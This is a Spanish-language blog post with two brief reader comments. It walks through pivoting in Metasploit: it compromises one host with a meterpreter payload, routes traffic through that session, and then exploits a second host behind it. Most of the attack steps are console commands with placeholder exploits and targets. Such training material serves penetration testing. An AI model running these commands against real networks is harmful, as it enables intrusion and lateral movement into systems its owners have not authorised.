martes, 12 de mayo de 2009

Pivoting con MetaSploit

Una pregunta recurrente durante los COMBAT trainings, es como atacar a un host desde otro al cual ya hemos ganado acceso con MetaSploit.


Una forma sencilla de hacerlo, es utilizando el comando "route" de MetaSploit, que nos va a permitir atacar un host, ruteando el tráfico por otro host al que ya tenemos acceso.

El primer paso es explotar una vulnerabilidad usando como payload a meterpreter:

msf> use [exploit]
msf> set PAYLOAD windows/meterpreter/bind_tcp
msf> set RHOST [victima1]
msf> exploit

Una vez que estamos dentro de meterpreter, salimos de la sesión presionando "CTRL-Z", al hacerlo nos va a indicar el ID de la sesión.

Luego, vamos a crear una ruta para VICTIMA2 indicando su IP y máscara, junto al ID de sesión que tenemos con meterpreter (1 en este caso). Hay que tener en cuenta que el comando "route" que vamos a utilizar, no es el mismo comando "route" que esta dentro de la shell de meterpreter.

Si no estamos seguros cual era el ID de sesión, podemos verificarlo con el comando "sessions -l":

meterpreter>

CTRL-Z

msf> route add [victima2] 255.255.255.255 1

En este ejemplo, usamos esta máscara porque solamente queremos llegar a ese host, pero podríamos hacerlo para todo un segmento (192.168.1.0/255.255.255.0).

Finalmente lanzamos el exploit contra la VICTIMA2 pasando por VICTIMA1, lo cual podemos verificar si realizamos un "netstat -na" en el ultimo host:

msf> use [exploit]
msf> set PAYLOAD windows/meterpreter/bind_tcp
msf> set RHOST [victima2]
msf> exploit

Próximamente mas tips con MetaSploit.

2 comentarios:

KerneLinux dijo...

EXCELENTO POST!

Anónimo dijo...

Buenísima la info.. el dibu del ninja se me hace conocido, pero en dónde? :-P~ haha, excelente! Saludos

LinkWithin